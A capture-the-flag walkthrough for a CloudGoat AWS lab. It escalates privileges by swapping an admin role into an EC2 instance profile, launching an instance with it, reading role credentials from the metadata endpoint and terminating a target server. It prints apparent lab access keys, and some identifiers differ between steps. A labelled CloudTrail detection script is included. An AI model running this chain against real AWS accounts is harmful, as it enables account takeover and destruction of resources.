Cloudgoat AWS CTF solution - Scenario 5 (iam_privesc_by_attachment)
Scenario: iam_privesc_by_attachment
Deployment:
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py create iam_privesc_by_attachment
Add the scenario's starting credentials to ~/.aws/credentials (used below as the "kerrigan" profile).
Scenario Resources
- 1 VPC with: EC2 x 1
- 1 IAM User
Scenario Start(s)
- IAM User "Kerrigan"
Scenario Goal(s)
Delete the EC2 instance "cg-super-critical-security-server"
Summary
Starting with a very limited set of permissions, the attacker is able to leverage the instance-profile-attachment permissions to create a new EC2 instance with significantly greater privileges than their own. With access to this new EC2 instance, the attacker gains full administrative powers within the target account and is able to accomplish the scenario's goal, deleting the cg-super-critical-security-server and paving the way for further nefarious actions.
Exploitation Route(s)
Walkthrough - IAM User "kerrigan"
1. Starting as the IAM user "Kerrigan", the attacker uses their limited privileges to explore the environment.
a. Used pacu's "iam__bruteforce_permissions" module to enumerate permissions:
run iam__bruteforce_permissions
ec2:
describe_iam_instance_profile_associations
describe_instances
describe_security_groups
describe_subnets
describe_vpcs
get_associated_enclave_certificate_iam_roles
get_console_screenshot
get_host_reservation_purchase_preview
s3:
get_object_torrent
head_bucket
b. Using enumerate-iam to brute-force permissions.
git clone https://github.com/andresriancho/enumerate-iam.git
cd enumerate-iam/
pip3 install -r requirements.txt
cd enumerate_iam
git clone https://github.com/aws/aws-sdk-js.git
python3 generate_bruteforce_tests.py
After downloading aws-sdk-js into the "enumerate_iam" folder, run the generate_bruteforce_tests.py script.
c. Running "enumerate-iam":
python3 enumerate-iam.py --access-key AKIA4SM4ZEUHX7V5LYEU --secret-key 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
2. Checking running EC2 instances using ec2:DescribeInstances:
aws ec2 describe-instances --region us-east-1 --profile kerrigan --output text
3. Checking available instance profiles:
aws iam list-instance-profiles --profile kerrigan
We found an interesting instance profile "arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22" with the role "cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22".
4. Let's list roles, as we have list-roles permissions:
aws iam list-roles --profile kerrigan
We found 2 interesting roles:
cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 and cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22; judging by the name, the "mighty" one seems more interesting.
5. Let's try to add the "mighty" role to the instance profile.
Note: Our enumeration tools (pacu and enumerate-iam) were unable to determine these four permissions:
"iam:AddRoleToInstanceProfile", "iam:RemoveRoleFromInstanceProfile", "ec2:AssociateIamInstanceProfile", "ec2:RunInstances"
but upon manually checking I found our user has these additional permissions.
aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerrigan
We got an error: "Cannot exceed quota for InstanceSessionsPerInstanceProfile: 1". Let's remove the existing attached role and then try to add the "mighty" role:
aws iam remove-role-from-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerrigan
aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerrigan
6. Now we can use the "AssociateIamInstanceProfile" permission to associate this profile ("cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22") with the running EC2 instance.
aws ec2 associate-iam-instance-profile --iam-instance-profile file://instance_profile.json --instance-id "i-0f1a8f37275d27fcd" --profile kerrigan --region us-east-1
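A defender-side check for the role swap performed in steps 5 and 6, added here as an example and not part of the original walkthrough or of CloudGoat: it scans CloudTrail-style records for a principal that removes one role from an instance profile and adds a different role to it within a short window, then lists any instance that principal associated the profile with. All event records are constructed, the EC2 request-parameter layout is flattened for brevity, and the account number, role names and instance ID are placeholders.

```python
# Detect the instance-profile role-swap pattern in CloudTrail events. The records below
# are constructed (not real CloudTrail output); EC2 request parameters are flattened.
from datetime import datetime, timedelta
ACTOR = "arn:aws:iam::111111111111:user/kerrigan"          # constructed principal ARNs
PIPELINE = "arn:aws:iam::111111111111:user/deploy-pipeline"
# Events 0-2: meek role swapped for mighty role, then profile attached to a running
# instance, all by one user. Events 3-4: a benign re-attach of the same role.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventName": "RemoveRoleFromInstanceProfile",
     "userIdentity": {"arn": ACTOR},
     "requestParameters": {"instanceProfileName": "cg-ec2-meek-instance-profile", "roleName": "cg-ec2-meek-role"}},
    {"eventTime": "2024-01-01T10:00:20Z", "eventName": "AddRoleToInstanceProfile",
     "userIdentity": {"arn": ACTOR},
     "requestParameters": {"instanceProfileName": "cg-ec2-meek-instance-profile", "roleName": "cg-ec2-mighty-role"}},
    {"eventTime": "2024-01-01T10:01:00Z", "eventName": "AssociateIamInstanceProfile",
     "userIdentity": {"arn": ACTOR},
     "requestParameters": {"instanceProfileName": "cg-ec2-meek-instance-profile", "instanceId": "i-0123456789abcdef0"}},
    {"eventTime": "2024-01-01T12:00:00Z", "eventName": "RemoveRoleFromInstanceProfile",
     "userIdentity": {"arn": PIPELINE},
     "requestParameters": {"instanceProfileName": "app-profile", "roleName": "app-role"}},
    {"eventTime": "2024-01-01T12:00:05Z", "eventName": "AddRoleToInstanceProfile",
     "userIdentity": {"arn": PIPELINE},
     "requestParameters": {"instanceProfileName": "app-profile", "roleName": "app-role"}},
]

def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def find_role_swaps(events, window=timedelta(minutes=15)):
    """Alert when one principal removes a role from an instance profile and within
    `window` adds a different role to it; list instances it then attached it to."""
    events = sorted(events, key=_ts)
    alerts = []
    for i, rem in enumerate(events):
        if rem["eventName"] != "RemoveRoleFromInstanceProfile":
            continue
        actor, params = rem["userIdentity"]["arn"], rem["requestParameters"]
        profile, old_role = params["instanceProfileName"], params["roleName"]
        later = [e for e in events[i + 1:] if _ts(e) - _ts(rem) <= window
                 and e["userIdentity"]["arn"] == actor
                 and e["requestParameters"].get("instanceProfileName") == profile]
        new_roles = [e["requestParameters"]["roleName"] for e in later
                     if e["eventName"] == "AddRoleToInstanceProfile"
                     and e["requestParameters"]["roleName"] != old_role]
        if new_roles:
            attached = [e["requestParameters"]["instanceId"] for e in later
                        if e["eventName"] == "AssociateIamInstanceProfile"]
            alerts.append({"actor": actor, "profile": profile, "old_role": old_role,
                           "new_role": new_roles[0], "attached_to": attached})
    return alerts
```

The same swap-then-attach sequence should also be caught when the profile is handed to a new instance via RunInstances; adding that event name to the `attached` filter (with its own request-parameter shape) extends the check.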
7. Now we are ready to spin up an EC2 instance with full permissions.
a) Creating an EC2 SSH key pair:
aws ec2 create-key-pair --key-name pwned --profile kerrigan --query 'KeyMaterial' --region us-east-1 --output text > pwned.pem
b) Running the EC2 instance:
aws ec2 describe-security-groups --profile kerrigan --region us-east-1
aws ec2 describe-subnets --profile kerrigan --region us-east-1
aws ec2 run-instances --image-id ami-0a313d6098716f372 --instance-type t2.micro --iam-instance-profile Arn=arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgid7c11loyvlf --key-name pwned --profile kerrigan --subnet-id subnet-07be3953f5accbd47 --security-group-ids sg-0523b1376503ede0a --region us-east-1
8. Logging in and fetching credentials from this instance:
ssh -i pwned.pem ubuntu@54.145.230.120
curl 169.254.169.254/latest/meta-data/iam/security-credentials/
Alternatively, we can install the AWS CLI within the EC2 instance and run the commands from there.
9. Using these credentials to delete "cg-super-critical-security-server":
# Determining the instance ID
aws ec2 describe-instances --region us-east-1 --profile ec2_role
"i-0064345de3f005c7a"
aws ec2 terminate-instances --instance-ids i-0064345de3f005c7a --region us-east-1 --profile ec2_role